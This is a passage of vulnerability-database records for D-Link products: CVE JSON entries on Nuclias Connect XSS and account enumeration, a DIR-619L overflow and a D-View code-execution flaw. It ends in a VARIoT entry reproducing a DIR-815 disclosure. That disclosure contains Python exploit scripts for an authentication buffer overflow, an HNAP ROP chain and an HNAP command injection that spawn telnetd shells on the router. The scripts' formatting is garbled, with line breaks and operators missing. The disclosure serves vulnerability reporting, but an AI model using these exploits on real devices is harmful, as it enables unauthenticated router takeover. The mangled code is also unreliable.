"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain a stored cross-site scripting (XSS) vulnerability due to improper sanitization of the \u0027Network\u0027 field when editing the configuration, creating a profile, and adding a network. An authenticated attacker can inject arbitrary JavaScript to be executed in the context of other users viewing the profile entry. NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-592",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-592 Stored XSS"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:07:58.251Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-stored-xss"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Stored Cross-Site Scripting (XSS)",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34253",
"datePublished": "2025-10-16T18:53:49.731Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-14T02:07:58.251Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34255 (GCVE-0-2025-34255)
Vulnerability from cvelistv5 – Published: 2025-10-16 18:52 – Updated: 2026-05-25 23:41
- CWE-204 - Observable Response Discrepancy
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect | Affected: 0 , ≤ 1.3.1.4 (custom) | |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34255",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:29:11.316268Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:29:17.095Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"web interface"
],
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain an observable response discrepancy vulnerability.\u0026nbsp;The application\u0027s \u0027Forgot Password\u0027 endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server.\u0026nbsp;NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain an observable response discrepancy vulnerability.\u00a0The application\u0027s \u0027Forgot Password\u0027 endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server.\u00a0NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-575",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-575 Account Footprinting"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-204",
"description": "CWE-204 Observable Response Discrepancy",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-25T23:41:31.628Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-forgot-password-account-enumeration"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Forgot Password Account Enumeration",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34255",
"datePublished": "2025-10-16T18:52:59.964Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-25T23:41:31.628Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34254 (GCVE-0-2025-34254)
Vulnerability from cvelistv5 – Published: 2025-10-16 18:52 – Updated: 2026-05-25 23:41
- CWE-204 - Observable Response Discrepancy
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect | Affected: 0, ≤ 1.3.1.4 (custom) | |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34254",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:29:43.264857Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:29:49.920Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"web interface"
],
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain an observable response discrepancy vulnerability.\u0026nbsp;The application\u0027s \u0027Login\u0027 endpoint returns distinct JSON responses depending on whether the supplied username is associated with an existing account. Because the responses differ in the `error.message` string value, an unauthenticated remote attacker can enumerate valid usernames/accounts on the server.\u0026nbsp;NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain an observable response discrepancy vulnerability.\u00a0The application\u0027s \u0027Login\u0027 endpoint returns distinct JSON responses depending on whether the supplied username is associated with an existing account. Because the responses differ in the `error.message` string value, an unauthenticated remote attacker can enumerate valid usernames/accounts on the server.\u00a0NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-575",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-575 Account Footprinting"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-204",
"description": "CWE-204 Observable Response Discrepancy",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-25T23:41:30.851Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-login-account-enumeration"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Login Account Enumeration",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34254",
"datePublished": "2025-10-16T18:52:08.435Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-25T23:41:30.851Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-9566 (GCVE-0-2024-9566)
Vulnerability from cvelistv5 – Published: 2024-10-07 13:00 – Updated: 2024-10-07 13:25
Unsupported When Assigned
- CWE-120 - Buffer Overflow
| URL | Tags |
|---|---|
| https://vuldb.com/?id.279460 | vdb-entry, technical-description |
| https://vuldb.com/?ctiid.279460 | signature, permissions-required |
| https://vuldb.com/?submit.414541 | third-party-advisory |
| https://github.com/abcdefg-png/IoT-vulnerable/blo… | exploit |
| https://www.dlink.com/ | product |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | DIR-619L B1 | Affected: 2.06 | |
| d-link | dir-619l_b1 | Affected: 2.06 cpe:2.3:h:d-link:dir-619l_b1:*:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:h:d-link:dir-619l_b1:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "dir-619l_b1",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "2.06"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-9566",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T13:22:53.741353Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T13:25:20.194Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DIR-619L B1",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.06"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "yhryhryhr_miemie (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability classified as critical was found in D-Link DIR-619L B1 2.06. This vulnerability affects the function formDeviceReboot of the file /goform/formDeviceReboot. The manipulation of the argument next_page leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used."
},
{
"lang": "de",
"value": "In D-Link DIR-619L B1 2.06 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um die Funktion formDeviceReboot der Datei /goform/formDeviceReboot. Mittels dem Manipulieren des Arguments next_page mit unbekannten Daten kann eine buffer overflow-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 8.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 9,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T13:00:07.587Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-279460 | D-Link DIR-619L B1 formDeviceReboot buffer overflow",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.279460"
},
{
"name": "VDB-279460 | CTI Indicators (IOB, IOC, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.279460"
},
{
"name": "Submit #414541 | D-Link DIR-619L B1 2.06 Buffer Overflow",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.414541"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/abcdefg-png/IoT-vulnerable/blob/main/D-Link/DIR-619L/formDeviceReboot.md"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/"
}
],
"tags": [
"unsupported-when-assigned"
],
"timeline": [
{
"lang": "en",
"time": "2024-10-07T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-10-07T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-10-07T08:25:15.000Z",
"value": "VulDB entry last update"
}
],
"title": "D-Link DIR-619L B1 formDeviceReboot buffer overflow"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-9566",
"datePublished": "2024-10-07T13:00:07.587Z",
"dateReserved": "2024-10-07T06:19:48.194Z",
"dateUpdated": "2024-10-07T13:25:20.194Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-5299 (GCVE-0-2024-5299)
Vulnerability from cvelistv5 – Published: 2024-05-23 21:30 – Updated: 2024-08-01 21:11
- CWE-749 - Exposed Dangerous Method or Function
| URL | Tags |
|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-… | x_research-advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:d-link:d-view:0:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "d-view",
"vendor": "d-link",
"versions": [
{
"lessThan": "2.0.3.88",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-5299",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T13:43:24.500112Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T18:02:55.399Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:11:11.554Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-450",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-450/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "D-View",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.0.1.28"
}
]
}
],
"dateAssigned": "2024-05-23T21:29:10.311Z",
"datePublic": "2024-05-14T15:21:59.534Z",
"descriptions": [
{
"lang": "en",
"value": "D-Link D-View execMonitorScript Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the execMonitorScript method. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21828."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-749",
"description": "CWE-749: Exposed Dangerous Method or Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-23T21:30:14.551Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-450",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-450/"
}
],
"source": {
"lang": "en",
"value": "06fe5fd2bc53027c4a3b7e395af0b850e7b8a044"
},
"title": "D-Link D-View execMonitorScript Exposed Dangerous Method Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-5299",
"datePublished": "2024-05-23T21:30:14.551Z",
"dateReserved": "2024-05-23T21:29:10.280Z",
"dateUpdated": "2024-08-01T21:11:11.554Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-201507-0645
Vulnerability from variot - Updated: 2024-07-23 22:41
D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link products due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router.
## Advisory Information
Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline <patrick.cline@dlink.com> (Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has now taken the security advisory pages down, and hence the information needs to be publicly accessible so that users of these devices can update the router firmware. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
Product Description
DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices.
Vulnerabilities Summary
I have come across 3 security issues in the DIR-815 firmware which allow an attacker to exploit command injection and buffer overflows in the authentication and HNAP functionality. All of them can be exploited by an unauthenticated attacker. The attacker can be on the wireless LAN, or on the WAN if the management interface is exposed, to attack directly; if it is not exposed, the attack can be delivered using XSRF.
Details
Buffer overflow in auth
import urllib import urllib2
This exploits the auth_main.cgi with read buffer overflow exploit for v2.02
prequisite is just to have id and password fields in params
url = 'http://192.168.0.1/authentication.cgi' junk = "A"1004+"B"37+"\x58\xf8\x40\x00" # address of system function in executable junk+="X"*164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA" values = "id=test&password=test&test="+junk
req = urllib2.Request(url, values) response = urllib2.urlopen(req) the_page = response.read()
Buffer overflow in HNAP
import socket import struct
format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"286 buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0) buf+= "B"20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("1.2.3.4", 80)) s.send(buf)
Command injection in
import socket import struct
CSRF or any other trickery, but probably only works when connected to network I suppose
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.1", 80)) s.send(buf)
Report Timeline
- April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
- July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
- Nov 13, 2015: A public advisory is sent to security mailing lists.
Credit
This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201507-0645",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ethernet broadband router",
"scope": null,
"trust": 1.2,
"vendor": "dlink",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "134368"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05077",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05076",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2015-05077",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2015-05076",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
